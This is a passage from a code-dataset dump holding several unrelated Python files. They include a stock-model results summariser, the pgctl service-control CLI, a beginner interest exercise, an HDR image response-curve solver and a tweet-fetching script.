This feature is still under development.\")\r\n \r\n return cls(summary_df, results_dict)\r\n \r\n @timer_dec\r\n def add_confusion_matrix_stats(self, true_model_id: str, final_classifier_label: str):\r\n '''\r\n Adds the confusion matrix stats:\r\n True Positives,\r\n False Positives, \r\n False Negatives, \r\n True Negatives\r\n The default value for each is set to 0 and remains unchanged for the true_model referenced by the true_model_id.\r\n \r\n Args:\r\n true_model_id: The model_id of the control run to treat as the true case.\r\n final_classifier_label: The column label of the boolean classifier output being compared.\r\n '''\r\n self.summary_df[self.TRUE_POSITIVE_LABEL] = np.int(0)\r\n self.summary_df[self.FALSE_POSITIVE_LABEL] = np.int(0)\r\n self.summary_df[self.FALSE_NEGATIVE_LABEL] = np.int(0)\r\n self.summary_df[self.TRUE_NEGATIVE_LABEL] = np.int(0)\r\n \r\n true_model_stock_list = get_results_list(self.results_dict[true_model_id])\r\n true_model_concat_results = pd.concat(true_model_stock_list, ignore_index = True)\r\n \r\n for model_id in self.results_dict:\r\n if model_id == true_model_id:\r\n print(\"Skipping {0}\".format(model_id))\r\n continue\r\n print(\"Checking {0}\".format(model_id))\r\n \r\n model_stock_list = get_results_list(self.results_dict[model_id])\r\n model_concat_results = pd.concat(model_stock_list, ignore_index = True)\r\n \r\n true_positive_count = 0\r\n false_positive_count = 0\r\n false_negative_count = 0\r\n true_negative_count = 0\r\n for i in true_model_concat_results.index:\r\n if true_model_concat_results.at[i, final_classifier_label] == True and model_concat_results.at[i, final_classifier_label] == True:\r\n true_positive_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == False and model_concat_results.at[i, final_classifier_label] == True:\r\n false_positive_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == True and model_concat_results.at[i, final_classifier_label] == False:\r\n false_negative_count += 1\r\n elif true_model_concat_results.at[i, final_classifier_label] == False and model_concat_results.at[i, final_classifier_label] == False:\r\n true_negative_count += 1\r\n \r\n self.summary_df.at[model_id, self.TRUE_POSITIVE_LABEL] = true_positive_count\r\n self.summary_df.at[model_id, self.FALSE_POSITIVE_LABEL] = false_positive_count\r\n self.summary_df.at[model_id, self.FALSE_NEGATIVE_LABEL] = false_negative_count\r\n self.summary_df.at[model_id, self.TRUE_NEGATIVE_LABEL] = true_negative_count\r\n \r\n @timer_dec\r\n def add_geometric_mean(self, profit_label: str):\r\n '''\r\n Adds the geometric mean for the whole results_dict dataset.\r\n \r\n Args:\r\n profit_label: The column label for profits in the results_dict.\r\n '''\r\n self.summary_df[self.GEOMETRIC_MEAN_LABEL] = np.float\r\n for model_id in self.results_dict:\r\n model_list = get_results_list(self.results_dict[model_id])\r\n concat_results = pd.concat(model_list)\r\n self.summary_df.at[model_id, self.GEOMETRIC_MEAN_LABEL] = gmean(concat_results[profit_label].dropna().values.astype(np.float64) + 1)\r\n \r\n @timer_dec\r\n def add_compound_investment_samples(self, profit_label: str, date_label: str, num_of_samples: int = 5, cost_per_sale: float = 0.01):\r\n ''' \r\n Adds the compounded geometric returns of a realistic investment sample.\r\n This compounds over the available number of investment periods, based upon run_df length and hold_period.\r\n \r\n Args:\r\n profit_label: The column label for profits in the results_dict.\r\n date_label: The column label for dates in the results_dict.\r\n num_of_samples: Number 
of random samples to add to the DataFrame.\r\n cost_per_sale: The additional cost (loss) per buy/sell transaction pair.\r\n '''\r\n def get_sample(date_grouped_filtered_results: pd.core.groupby.groupby.DataFrameGroupBy, hold_period: int) -> float:\r\n ''' \r\n Iterate over the date groups, which should be pre-filtered to only include relevant results (i.e. results rows with a stock sale), \r\n selecting one at random from a group of dates, and then jumping hold_period days to select the next one \r\n This effectively models the time between buying and selling one investment at a time with one principal amount).\r\n NOTE: this is not precise on sparse data sets (i.e. fewer buy/sell opportunities), because they are less \r\n likely to have buy/sell opportunities on all days. Therefore mapping days with investment opportunities to hold_days is \r\n not 1:1 when the data is sparse. E.g. holding for 2 days (Mon-Wed) may actually end up holding for 3 days on sparse \r\n results data because there is no investment opportunity on Wed, so the next date group will be on Thurs, consequently \r\n leading to the possibility of fewer investments made within the compounding period. However, this is relatively fast for \r\n generating a large number of samples.\r\n '''\r\n counter = 0\r\n geometric_mean = 1\r\n for name, group in date_grouped_filtered_results:\r\n # Reset the index so we can use .at to select an item at random\r\n group = group.reset_index()\r\n if counter % hold_period == 0:\r\n items_in_group = len(group)\r\n geometric_multiplier = group.at[randint(0, items_in_group - 1), profit_label] + 1 - cost_per_sale\r\n geometric_mean *= geometric_multiplier \r\n counter += 1\r\n return geometric_mean\r\n \r\n # Add num_of_samples geometric mean samples columns to df\r\n for i in range(num_of_samples):\r\n # Get a unique column name\r\n print(\"Getting unique column name...\")\r\n name_index = i\r\n while get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, name_index) in self.summary_df.columns:\r\n name_index += 1\r\n column_name = get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, name_index)\r\n print(\"Done getting unique column name {0}.\".format(column_name))\r\n # Create empty column\r\n self.summary_df[column_name] = np.float\r\n # Iterate through each run\r\n for model_id in self.results_dict:\r\n print(\"Adding samples for {0}...\".format(model_id))\r\n # Convert the run dictionary into a list\r\n results_list = get_results_list(self.results_dict[model_id])\r\n # Concatenate it and group by date\r\n concat_results = pd.concat(results_list, sort=False)\r\n concat_filtered_results = concat_results.dropna()\r\n date_grouped_filtered_results = concat_filtered_results.groupby(date_label)\r\n self.summary_df.at[model_id, column_name] = get_sample(date_grouped_filtered_results, \r\n get_hold_period_from_model_id(model_id))\r\n print(\"Done adding samples for {0}.\".format(model_id))\r\n \r\n self._calculate_mean_of_compound_investment_samples()\r\n \r\n @timer_dec\r\n def _calculate_mean_of_compound_investment_samples(self):\r\n ''' \r\n This automatically looks at the number of geometric mean runs in self.summary_df and calculates the arithmetic mean. 
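
The nested get_sample above walks the date groups in order, picks one trade at random on every hold_period-th group, and multiplies the resulting returns together, subtracting the transaction cost per round trip. A stripped-down sketch of that compounding rule over a plain list of per-date return lists; random.choice stands in for the original's randint indexing.

import random

def compound_sample(daily_returns, hold_period, cost_per_sale=0.01):
    # daily_returns: one inner list of fractional returns per trading date.
    value = 1.0
    for day, returns in enumerate(daily_returns):
        if day % hold_period == 0 and returns:
            value *= 1.0 + random.choice(returns) - cost_per_sale
    return value

random.seed(0)
days = [[0.02, -0.01], [0.03], [0.01, 0.00], [0.02]]
print(compound_sample(days, hold_period=2))  # one possible compounded outcome
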
\r\n '''\r\n num_of_samples = 0\r\n for key in self.summary_df:\r\n if self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL in key:\r\n num_of_samples += 1\r\n print(\"Calculating mean of geometric mean samples...\")\r\n self.summary_df[self.COMPOUND_INVESTMENT_SAMPLES_MEAN] = self.summary_df[\r\n [get_indexed_column_name(self.COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL, i) for i in range(num_of_samples)]].mean(1)\r\n print(\"Done calculating mean of geometric mean samples.\")\r\n \r\n def __repr__(self):\r\n '''\r\n Calls internal DataFrame's __repr__ method.\r\n \r\n Returns:\r\n self.summary_df.__repr__()\r\n '''\r\n return self.summary_df.__repr__()\r\n \r\n def __str__(self):\r\n '''\r\n Calls internal DataFrame's __str__ method.\r\n \r\n Returns:\r\n self.summary_df.__str__()\r\n '''\r\n return self.summary_df.__str__()\r\n \r\n def write_to_json_file(self, summary_filepath: str, original_results_filepath: str = None):\r\n '''\r\n Saves the SummaryResults to a json file. Optionally can also save the original results DataFrame\r\n Note: the original results DataFrame is required for doing additional analysis.\r\n \r\n Args:\r\n summary_filepath: The path to save ResultsSummary json data to.\r\n original_results_filepath: The path to save original results json data to (optional).\r\n '''\r\n # Save summary results DataFrame\r\n try:\r\n self.summary_df.to_json(summary_filepath)\r\n except OSError as e:\r\n print(\"Invalid filepath '{0}'.\".format(summary_filepath))\r\n raise e\r\n if original_results_filepath is not None:\r\n # Save original results dictionary of dictionaries of DataFrames\r\n raise NotImplementedError(\"Original results saving is not yet implemented. This feature is still under development.\")\r\n ","sub_path":"results_helper.py","file_name":"results_helper.py","file_ext":"py","file_size_in_byte":17513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435847653","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport subprocess\nimport time\nfrom time import time as now\n\nimport six\nfrom cached_property import cached_property\nfrom frozendict import frozendict\nfrom py._path.local import LocalPath as Path\n\nfrom .config import Config\nfrom .configsearch import search_parent_directories\nfrom .daemontools import SvStat\nfrom .debug import debug\nfrom .debug import trace\nfrom .errors import CircularAliases\nfrom .errors import NoPlayground\nfrom .errors import PgctlUserMessage\nfrom .errors import Unsupervised\nfrom .functions import bestrelpath\nfrom .functions import commafy\nfrom .functions import exec_\nfrom .functions import JSONEncoder\nfrom .functions import unique\nfrom .service import Service\nfrom pgctl import __version__\n\n\nXDG_RUNTIME_DIR = os.environ.get('XDG_RUNTIME_DIR') or '~/.run'\nALL_SERVICES = '(all services)'\nPGCTL_DEFAULTS = frozendict({\n # TODO-DOC: config\n # where do our services live?\n 'pgdir': 'playground',\n # where does pgdir live?\n 'pghome': os.path.join(XDG_RUNTIME_DIR, 'pgctl'),\n # which services are we acting on?\n 'services': ('default',),\n # how long do we wait for them to come down/up?\n 'timeout': '2.0',\n 'poll': '.01',\n # what are the named groups of services?\n 'aliases': frozendict({\n 'default': (ALL_SERVICES,)\n }),\n})\nCHANNEL = '[pgctl]'\n\n\nclass StateChange(object):\n\n def __init__(self, service):\n self.service = service\n self.name = 
service.name\n\n\nclass Start(StateChange):\n\n def change(self):\n return self.service.start()\n\n def assert_(self):\n return self.service.assert_ready()\n\n def get_timeout(self):\n return self.service.timeout_ready\n\n class strings(object):\n change = 'start'\n changing = 'Starting:'\n changed = 'Started:'\n\n\nclass Stop(StateChange):\n\n def change(self):\n return self.service.stop()\n\n def assert_(self):\n return self.service.assert_stopped()\n\n def get_timeout(self):\n return self.service.timeout_stop\n\n class strings(object):\n change = 'stop'\n changing = 'Stopping:'\n changed = 'Stopped:'\n\n\ndef pgctl_print(*print_args, **print_kwargs):\n from sys import stderr\n print_kwargs.setdefault('file', stderr)\n print(CHANNEL, *print_args, **print_kwargs)\n stderr.flush()\n\n\ndef timeout(service_name, error, action_name, start_time, timeout_length, check_time):\n curr_time = now()\n check_length = curr_time - check_time\n next_time = curr_time + check_length\n limit_time = start_time + timeout_length\n\n # assertion can take a long time. we timeout as close to the limit_time as we can.\n if abs(curr_time - limit_time) < abs(next_time - limit_time):\n actual_timeout_length = curr_time - start_time\n error_message = \"ERROR: service '{}' failed to {} after {:.2f} seconds\".format(\n service_name,\n action_name,\n actual_timeout_length,\n )\n if actual_timeout_length - timeout_length > 0.1:\n error_message += ' (it took {}s to poll)'.format(\n check_length,\n ) # TODO-TEST: pragma: no cover: we only hit this when lsof is being slow; add a unit test\n error_message += ', ' + str(error)\n pgctl_print(error_message)\n return True\n else:\n trace('service %s still waiting: %.1f seconds.', service_name, limit_time - curr_time)\n return False\n\n\nclass PgctlApp(object):\n\n def __init__(self, config=PGCTL_DEFAULTS):\n self.pgconf = frozendict(config)\n\n def __call__(self):\n \"\"\"Run the app.\"\"\"\n # config guarantees this is set\n command = self.pgconf['command']\n # argparse guarantees this is an attribute\n command = getattr(self, command)\n try:\n result = command()\n except PgctlUserMessage as error:\n # we don't need or want a stack trace for user errors\n result = str(error)\n\n if isinstance(result, six.string_types):\n return CHANNEL + ' ERROR: ' + result\n else:\n return result\n\n def __change_state(self, state):\n \"\"\"Changes the state of a supervised service using the svc command\"\"\"\n # if we're starting a service, run the playground-wide \"pre-start\" hook (if it exists)\n if state is Start:\n self.run_pre_start_hook()\n\n # we lock the whole playground; only one pgctl can change the state at a time, reliably\n def on_lock_held(path):\n from .errors import reraise\n from .errors import LockHeld\n from .functions import ps\n from .fuser import fuser\n reraise(LockHeld(\n 'another pgctl command is currently managing this service: (%s)\\n%s' %\n (bestrelpath(path), ps(fuser(path)))\n ))\n\n from contextlib2 import ExitStack\n with ExitStack() as context:\n for service in self.services:\n service.ensure_exists()\n\n # This lock represents a pgctl cli interacting with the service.\n from .flock import flock\n lock = context.enter_context(flock(\n service.path.join('.pgctl.lock').strpath,\n on_fail=on_lock_held,\n ))\n from .flock import set_fd_inheritable\n set_fd_inheritable(lock, False)\n\n return self.__locked_change_state(state)\n\n def __locked_change_state(self, state):\n \"\"\"the critical section of __change_state\"\"\"\n pgctl_print(state.strings.changing, 
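
The timeout() helper above gives up not when the deadline has strictly passed, but when the current moment is closer to the deadline than the projected next check would be, so a slow assertion does not overshoot the budget by a whole poll interval. A small numeric illustration of that decision rule:

def should_time_out(curr_time, check_length, start_time, timeout_length):
    # Give up if we are nearer the deadline now than the next check would be.
    next_time = curr_time + check_length
    limit_time = start_time + timeout_length
    return abs(curr_time - limit_time) < abs(next_time - limit_time)

# Deadline at t=2.0; each check takes 0.5 s.
print(should_time_out(1.6, 0.5, 0.0, 2.0))  # False: t=2.1 is closer to 2.0 than t=1.6
print(should_time_out(1.9, 0.5, 0.0, 2.0))  # True: t=1.9 is closer to 2.0 than t=2.4
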
commafy(self.service_names))\n services = [state(service) for service in self.services]\n failed = []\n start_time = now()\n while services:\n for service in services:\n try:\n service.change()\n except Unsupervised:\n pass # handled in state assertion, below\n for service in tuple(services):\n check_time = now()\n try:\n service.assert_()\n except PgctlUserMessage as error:\n if timeout(service.name, error, state.strings.change, start_time, service.get_timeout(), check_time):\n services.remove(service)\n failed.append(service.name)\n else:\n # TODO: debug() takes a lambda\n debug('loop: check_time %.3f', now() - check_time)\n pgctl_print(state.strings.changed, service.name)\n service.service.message(state)\n services.remove(service)\n\n time.sleep(float(self.pgconf['poll']))\n\n return failed\n\n def run_pre_start_hook(self):\n \"\"\"Run the playground-wide pre-start hook, if it exists.\"\"\"\n try:\n path = self.pgdir.join('pre-start')\n if path.exists():\n subprocess.check_call(\n (path.strpath,),\n cwd=self.pgdir.dirname,\n )\n except NoPlayground:\n # services can exist without a playground;\n # that's fine, but they can't have pre-start hooks\n pass\n\n def with_services(self, services):\n \"\"\"return a similar PgctlApp, but with a different set of services\"\"\"\n newconf = dict(self.pgconf)\n newconf['services'] = services\n return PgctlApp(newconf)\n\n def __show_failure(self, state, failed):\n if not failed:\n return\n\n failapp = self.with_services(failed)\n childpid = os.fork()\n if childpid:\n os.waitpid(childpid, 0)\n else:\n os.dup2(2, 1) # send log to stderr\n failapp.log(interactive=False) # doesn't return\n if state == 'start':\n # we don't want services that failed to start to be 'up'\n failapp.stop()\n\n pgctl_print()\n pgctl_print('There might be useful information further up in the log; you can view it by running:')\n for service in failapp.services:\n pgctl_print(' less +G {}'.format(bestrelpath(service.path.join('log').strpath)))\n\n raise PgctlUserMessage('Some services failed to %s: %s' % (state, commafy(failed)))\n\n def start(self):\n \"\"\"Idempotent start of a service or group of services\"\"\"\n failed = self.__change_state(Start)\n return self.__show_failure('start', failed)\n\n def stop(self):\n \"\"\"Idempotent stop of a service or group of services\"\"\"\n failed = self.__change_state(Stop)\n return self.__show_failure('stop', failed)\n\n def status(self):\n \"\"\"Retrieve the PID and state of a service or group of services\"\"\"\n for service in self.services:\n status = service.svstat()\n if status.state == SvStat.UNSUPERVISED:\n # this is the expected state for down services.\n status = status._replace(state='down')\n print('%s: %s' % (service.name, status))\n\n def restart(self):\n \"\"\"Starts and stops a service\"\"\"\n self.stop()\n self.start()\n\n def reload(self):\n \"\"\"Reloads the configuration for a service\"\"\"\n pgctl_print('reload:', commafy(self.service_names))\n raise PgctlUserMessage('reloading is not yet implemented.')\n\n def log(self, interactive=None):\n \"\"\"Displays the stdout and stderr for a service or group of services\"\"\"\n # TODO(p3): -n: send the value to tail -n\n # TODO(p3): -f: force iteractive behavior\n # TODO(p3): -F: force iteractive behavior off\n tail = ('tail', '-n', '30', '--verbose') # show file headers\n\n if interactive is None:\n import sys\n interactive = sys.stdout.isatty()\n if interactive:\n # we're interactive; give a continuous log\n # TODO-TEST: pgctl log | pb should be non-interactive\n tail += 
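
The critical section above follows a change/verify/poll pattern: issue the state change to every service, then repeatedly assert readiness, dropping services as they either succeed or exhaust their timeout budget. A generic sketch of that loop shape, with check() (returning None on success, an error otherwise) standing in for service.assert_() and a single shared timeout rather than the per-service budgets the original uses:

import time

def poll_until(items, check, timeout_s, poll_s=0.01):
    # Returns the items that never passed check() within timeout_s.
    start, pending, failed = time.time(), list(items), []
    while pending:
        for item in tuple(pending):
            error = check(item)
            if error is None:
                pending.remove(item)
            elif time.time() - start > timeout_s:
                pending.remove(item)
                failed.append(item)
        time.sleep(poll_s)
    return failed

print(poll_until(['svc-a'], lambda name: None, timeout_s=1.0))  # []
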
('--follow=name', '--retry')\n\n logfiles = []\n for service in self.services:\n service.ensure_logs()\n logfile = service.path.join('log')\n logfile = bestrelpath(str(logfile))\n logfiles.append(logfile)\n exec_(tail + tuple(logfiles)) # never returns\n\n def debug(self):\n \"\"\"Allow a service to run in the foreground\"\"\"\n try:\n # start supervise in the foreground with the service up\n service, = self.services # pylint:disable=unpacking-non-sequence\n except ValueError:\n raise PgctlUserMessage(\n 'Must debug exactly one service, not: ' + commafy(self.service_names),\n )\n\n self.stop()\n service.foreground() # never returns\n\n def config(self):\n \"\"\"Print the configuration for a service\"\"\"\n print(JSONEncoder(sort_keys=True, indent=4).encode(self.pgconf))\n\n def service_by_name(self, service_name):\n \"\"\"Return an instantiated Service, by name.\"\"\"\n if os.path.isabs(service_name):\n path = Path(service_name)\n else:\n path = self.pgdir.join(service_name, abs=1)\n return Service(\n path,\n self.pghome.join(path.relto(str('/')), abs=1),\n self.pgconf['timeout'],\n )\n\n @cached_property\n def services(self):\n \"\"\"Return a tuple of the services for a command\n\n :return: tuple of Service objects\n \"\"\"\n services = [\n self.service_by_name(service_name)\n for alias in self.pgconf['services']\n for service_name in self._expand_aliases(alias)\n ]\n return unique(services)\n\n def _expand_aliases(self, name):\n aliases = self.pgconf['aliases']\n visited = set()\n stack = [name]\n result = []\n\n while stack:\n name = stack.pop()\n if name == ALL_SERVICES:\n result.extend(self.all_service_names)\n elif name in visited:\n raise CircularAliases(\"Circular aliases! Visited twice during alias expansion: '%s'\" % name)\n else:\n visited.add(name)\n if name in aliases:\n stack.extend(reversed(aliases[name]))\n else:\n result.append(name)\n\n return result\n\n @cached_property\n def all_service_names(self):\n \"\"\"Return a tuple of all of the Services.\n\n :return: tuple of strings -- the service names\n \"\"\"\n pgdir = self.pgdir.listdir(sort=True)\n\n return tuple(\n service_path.basename\n for service_path in pgdir\n if service_path.check(dir=True)\n )\n\n @cached_property\n def service_names(self):\n return tuple([service.name for service in self.services])\n\n @cached_property\n def pgdir(self):\n \"\"\"Retrieve the set playground directory\"\"\"\n for parent in search_parent_directories():\n pgdir = Path(parent).join(self.pgconf['pgdir'], abs=1)\n if pgdir.check(dir=True):\n return pgdir\n raise NoPlayground(\n \"could not find any directory named '%s'\" % self.pgconf['pgdir']\n )\n\n @cached_property\n def pghome(self):\n \"\"\"Retrieve the set pgctl home directory.\n\n By default, this is \"$XDG_RUNTIME_DIR/pgctl\".\n \"\"\"\n return Path(self.pgconf['pghome'], expanduser=True)\n\n commands = (start, stop, status, restart, reload, log, debug, config)\n\n\ndef parser():\n commands = [command.__name__ for command in PgctlApp.commands]\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', action='version', version=__version__)\n parser.add_argument('--pgdir', help='name the playground directory', default=argparse.SUPPRESS)\n parser.add_argument('--pghome', help='directory to keep user-level playground state', default=argparse.SUPPRESS)\n parser.add_argument('command', help='specify what action to take', choices=commands, default=argparse.SUPPRESS)\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--all', '-a',\n 
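
_expand_aliases above is an iterative depth-first expansion with a visited set for cycle detection; pushing reversed(aliases[name]) preserves the configured order once names are popped off the stack. A self-contained sketch of the same algorithm (ValueError stands in for the repo's CircularAliases):

def expand_aliases(name, aliases):
    visited, stack, result = set(), [name], []
    while stack:
        name = stack.pop()
        if name in visited:
            raise ValueError("circular alias: %s" % name)
        visited.add(name)
        if name in aliases:
            stack.extend(reversed(aliases[name]))
        else:
            result.append(name)
    return result

aliases = {'default': ('web', 'db'), 'web': ('nginx', 'gunicorn')}
print(expand_aliases('default', aliases))  # ['nginx', 'gunicorn', 'db']

Note that, as in the original, any name reached twice raises, so a service listed under two expanded aliases is reported as circular as well.
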
action='store_const', const=(ALL_SERVICES,),\n dest='services',\n help='act upon all services',\n default=argparse.SUPPRESS,\n )\n group.add_argument('services', nargs='*', help='specify which services to act upon', default=argparse.SUPPRESS)\n\n return parser\n\n\ndef main(argv=None):\n p = parser()\n args = p.parse_args(argv)\n config = Config('pgctl')\n config = config.combined(PGCTL_DEFAULTS, args)\n app = PgctlApp(config)\n\n return app()\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"pgctl/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":14824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"476838941","text":"amount = eval(input(\"Enter the initial deposit amount: \"))\namount = int(amount)\n\ninterest = eval(input(\"Enter annual percentage yield: \"))\ninterest = float(interest)\n\nmonths = eval(input(\"Enter maturity period (number of months): \"))\nmonths = int(months)\n\nprint(\"Month CD Value\")\nsum = 0\nfor i in range(months):\n sum = sum + (amount * 0.00417)\n print(i + 1, \"\\t\\t\\t\", sum)","sub_path":"PythonProgramming/cp05/프로그래밍 연습문제(cp05)/5.33.py","file_name":"5.33.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"124507296","text":"import os\nimport re\n\nimport numpy as np\nfrom nptyping import Array\n\n\ndef classic_weight_function(intensity: float) -> float:\n \"\"\"\n Basic way of weighing the intensity\n\n As defined by equation 3 from the paper\n \"\"\"\n if intensity <= 128:\n return intensity\n return 255 - intensity\n\n\ndef get_numbers(path) -> list:\n \"\"\"\n Get the number from the string\n\n Used for getting the correct **\n \"\"\"\n array = re.findall(r'[0-9]+', os.path.basename(path))\n return array\n\n\nclass hdr_handler:\n \"\"\"\n This class describes how to handle HDR images.\n \"\"\"\n\n def __init__(self, images, user_defined_weight_fuction=classic_weight_function):\n \"\"\"\n Constructs a new instance of the hdr_handler object.\n\n Parameters\n ----------\n images : list\n List of images to create a HDR image from\n user_defined_weight_fuction : callable\n If you want to use a custom weight function\n \"\"\"\n self.weight_function = user_defined_weight_fuction\n\n if user_defined_weight_fuction == classic_weight_function:\n assert (self.weight_function(128) == 128)\n assert (self.weight_function(129) == 126)\n\n self.images = images\n\n for i in range(len(self.images)):\n self.images[i].data = (255 * self.images[i].data).astype(np.uint8).astype(\n np.float64)\n\n self.B = np.array([\n np.log(int(get_numbers(i.path)[0])) for i in self.images\n ])\n\n self.pixel_area = self.images[0].data.shape\n self.pixel_area = self.pixel_area[0] * self.pixel_area[1]\n\n # is lambda, the constant that determines the amount of smoothness\n self.lambda_constant = 100\n\n self.Z = self.sample()\n\n def normalize(self, x) -> Array:\n \"\"\"\n Normalize the image with a min-max scaling\n\n Parameters\n ----------\n x : ndarray\n The input (not normalized) image\n\n Returns\n -------\n ndarray\n The normalized image\n \"\"\"\n for i in range(x.shape[-1]):\n max_val = np.max(x[:, :, i])\n min_val = np.min(x[:, :, i])\n x[:, :, i] = (x[:, :, i] + abs(min_val)) / (max_val + abs(min_val))\n return x\n\n def get_pixel(self, image, sample) -> Array:\n \"\"\"\n Get the pixel from the sample (x, y) in the image\n\n Parameters\n ----------\n image : ndarray\n The image to sample from\n sample 
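
The CD-value exercise just above never uses the APY it reads: it hard-codes a monthly rate of 0.00417 (roughly 5%/12) and accumulates simple interest into `sum` instead of compounding the balance. A corrected sketch, assuming the usual textbook formulation of compounding monthly at annualRate/1200; float()/int() also replace the redundant and unsafe eval(input()) calls:

amount = float(input("Enter the initial deposit amount: "))
apy = float(input("Enter annual percentage yield: "))
months = int(input("Enter maturity period (number of months): "))

print("Month  CD Value")
value = amount
for month in range(1, months + 1):
    value += value * apy / 1200  # compound monthly at APY percent per year
    print("%d\t%.2f" % (month, value))
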
: ndarray\n The location to sample from\n\n Returns\n -------\n ndarray\n The image values at the sampled location\n \"\"\"\n results = np.zeros(sample.shape)\n image_flat = image.flatten()\n for index, i in enumerate(sample.flatten()):\n results[:, index] = image_flat[int(i)]\n return results\n\n def sample(self, size=100) -> Array:\n \"\"\"\n Sample pixel values from all the images\n\n Randomly selects pixels from all of the images as a sample\n\n Parameters\n ----------\n size : int\n The sample size for each image\n\n Returns\n -------\n ndarray\n The sampled array for each channel and image\n \"\"\"\n sample_space = np.ceil(np.random.rand(1, size) * self.pixel_area)\n\n Z = np.zeros((size, len(self.images), 3))\n for index, image in enumerate(self.images):\n for channel in range(3):\n Z[:, index, channel] = self.get_pixel(image.data, sample_space)\n return Z\n\n def get_radiance(self) -> Array:\n \"\"\"\n Get the radiance of (R,G,B)\n\n Returns\n -------\n ndarray\n The radiance\n \"\"\"\n self.radiance = np.zeros((255, 3))\n for channel in range(3):\n g, lE = self.gsolve(self.Z[:, :, channel])\n self.radiance[:, channel] = g[:, 0]\n return self.radiance\n\n def get_Ab(self, Z, n=256) -> tuple:\n \"\"\"\n Creates the A and b matrices\n\n Parameters\n ----------\n Z : ndarray\n The sampled array\n n : int\n The color space max\n\n Returns\n -------\n ndarray\n The A matrix\n ndarray\n The b matrix\n int\n The color space max\n \"\"\"\n k = 0\n A = np.zeros((Z.shape[0] * Z.shape[1] + n + 1, n + Z.shape[0]))\n b = np.zeros((A.shape[0], 1))\n\n for i in range(Z.shape[0]):\n for j in range(Z.shape[1]):\n Z_ij = int(round(Z[i, j]))\n w_ij = self.weight_function(Z_ij + 1)\n\n A[k, Z_ij] = w_ij\n A[k, n + i] = -w_ij\n\n w_ij = self.weight_function(int(Z[i, j]) + 1)\n b[k, 0] = w_ij * self.B[j]\n k += 1\n\n A[k, 128] = 1\n k += 1\n\n for i in range(0, n - 3):\n A[k, i] = self.lambda_constant * self.weight_function(i + 2)\n A[k, i + 1] = -2 * self.lambda_constant * self.weight_function(i + 2)\n A[k, i + 2] = self.lambda_constant * self.weight_function(i + 2)\n k += 1\n return A, b, n\n\n def gsolve(self, Z) -> tuple:\n \"\"\"\n Gets the response function\n\n From the paper : \"Given a set of pixel values observed for several pixels in several\n images with different exposure times, this function returns the\n imaging system’s response function g as well as the log film irradiance\n values for the observed pixels.\"\n\n\n Parameters\n ----------\n Z : ndarray\n The sampled array of pixel values\n\n Returns\n -------\n ndarray\n The response function\n ndarray\n The \"log film irradiance values for the observed pixels.\" - paper qoute\n \"\"\"\n\n A, b, n = self.get_Ab(Z)\n\n #\tusing leastsq did not work\n #\thttps://github.com/numpy/numpy/issues/9563\n def leastsq(X, Y):\n \"\"\" Solves the problem Y = XB \"\"\"\n inv = np.linalg.pinv(np.dot(X.T, X))\n cross = np.dot(inv, X.T)\n beta = np.dot(cross, Y)\n return beta\n\n x = leastsq(A, b)\n g = x[1:n]\n lE = x[n + 1:x.shape[0]]\n return g, lE\n\n def look_up_pixel(self, radiance, image) -> Array:\n \"\"\"\n Check the radiance value on the (x, y) from the image\n\n Creates a new image based on the mapping of the response function\n\n Parameters\n ----------\n radiance : ndarray\n The radiance value based on the response function\n image : ndarray\n The image we are working on\n\n Returns\n -------\n ndarray\n Output image\n \"\"\"\n out_image = np.zeros((image.shape))\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n 
out_image[i, j] = radiance[int(image[i, j]) - 1]\n return out_image\n\n def get_radiance_log(self, radiance) -> Array:\n \"\"\"\n Equation 6 from the paper\n\n Parameters\n ----------\n radiance : ndarray\n The radiance value based on the response function\n\n Returns\n -------\n ndarray\n The log output\n \"\"\"\n x = np.ones(self.images[0].data.shape)\n y = np.zeros(self.images[0].data.shape)\n\n for index, i in enumerate(self.images):\n g = i.data.copy()\n for rgb in range(3):\n g[:, :, rgb] = self.look_up_pixel(radiance[:, rgb], g[:, :, rgb])\n g -= self.B[index]\n\n f = np.vectorize(self.weight_function)\n wi = f(g.copy())\n x += wi * g\n y += wi\n radiance_log = (x / y)\n return radiance_log\n","sub_path":"src/engine/hdr_image_handler.py","file_name":"hdr_image_handler.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"227965989","text":"from getLiveTweet import get_live_tweets\nfrom getPastTweets import get_past_tweets\n\nif __name__ == '__main__':\n stockName = request.form['text']\n isLive = request.form['isLive']\n if isLive == True:\n print(\"Now viewing live tweets:\")\n get_live_tweets(stockName)\n else:\n tweets_to_open = request.form['tweets_to_open']\n days_past = request.form['days_past']\n get_past_tweets(stockName, int(tweets_to_open), int(days_past))\n print(\"\\nAll tweets are stored in a json for easy access.\")\n\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"613655707","text":"import simplejson as json\nfrom datetime import datetime\nfrom food import *\nfrom activity_level import ACTIVITY_LEVEL, GOAL\nfrom meal import *\n\nclass User:\n\t\n # CONSTRUCTORS ------------------------------------------------------------\n def __init__(self, user_json):\n\n #user = json.loads(user_json)['users'][0]\n user = user_json\n\n # attributes from database\n self.id = user['id'] \n self.name = user['name']\n self.email = user['email']\n self.card_id = user['card_id']\n self.birthday = datetime.strptime(user['birthday'],'%Y-%m-%d')\n self.age = self.calculate_age(self.birthday) if self.birthday is not None else 30\n self.sex = user['sex'] if user['sex'] is not None else 'M'\n self.weight = 